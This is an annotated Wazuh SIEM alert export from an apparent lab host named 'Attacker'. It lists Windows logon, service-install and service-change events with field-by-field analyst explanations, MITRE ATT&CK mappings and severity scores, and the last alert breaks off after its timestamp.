data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:40:40.9799561Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43525
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  14292
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

New Windows Service Created

🧠 What happened? New Windows Service Created

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:31:48.074+0000 | 🧠 MITRE: ['Persistence', 'Privilege Escalation'] – ['Windows Service'] [T1543.003]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1543.003

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:48.074+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  5
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  New Windows Service Created
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  61138
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1543.003']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Persistence', 'Privilege Escalation']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Windows Service']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_system']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533908.267277
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Service Control Manager
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {555908d1-a6d7-4695-8e1e-26931d2012f4}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventSourceName:  Service Control Manager
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  7045
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8080000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:31:16.4230414Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  2969
Incremental log record number – handy for timeline order.

data.win.system.processID:  772
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  3052
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "A service was installed in the system. Service Name: Bluetooth Device (Personal Area Network) Service File Name: \SystemRoot\System32\drivers\bthpan.sys Service Type: kernel mode driver Service Start Type: demand start Service Account: "
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.serviceName:  Bluetooth Device (Personal Area Network)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.imagePath:  \\SystemRoot\\System32\\drivers\\bthpan.sys
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.serviceType:  kernel mode driver
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.startType:  demand start
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  5
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Service startup type was changed

🧠 What happened? Service startup type was changed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:31:48.380+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:48.380+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Service startup type was changed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  61104
Numeric ID of the detection rule that fired.

rule.info:  This does not appear to be logged on Windows 2000
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.firedtimes:  9
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_system', 'policy_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.1', 'CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533908.269386
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Service Control Manager
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {555908d1-a6d7-4695-8e1e-26931d2012f4}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventSourceName:  Service Control Manager
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  7040
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8080000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:31:20.5278944Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  2970
Incremental log record number – handy for timeline order.

data.win.system.processID:  772
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  3052
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "The start type of the Background Intelligent Transfer Service service was changed from demand start to auto start."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param1:  Background Intelligent Transfer Service
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param2:  demand start
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param3:  auto start
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param4:  BITS
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:31:54.529+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:54.529+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  23
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533914.271196
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:41:18.2062622Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43568
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  9432
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Length of the session key negotiated at logon (e.g., 128‑bit); 0 means no session key was requested. Unusually short keys can indicate a downgrade attack.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:31:54.796+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:54.796+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  24
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533914.278532
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:42:38.4198684Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43571
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  14292
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Length of the session key negotiated at logon (e.g., 128‑bit); 0 means no session key was requested. Unusually short keys can indicate a downgrade attack.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows command prompt started by an abnormal process

🧠 What happened? Windows command prompt started by an abnormal process

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:32:00.460+0000 | 🧠 MITRE: ['Execution'] – ['Windows Command Shell'] [T1059.003]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:00.460+0000
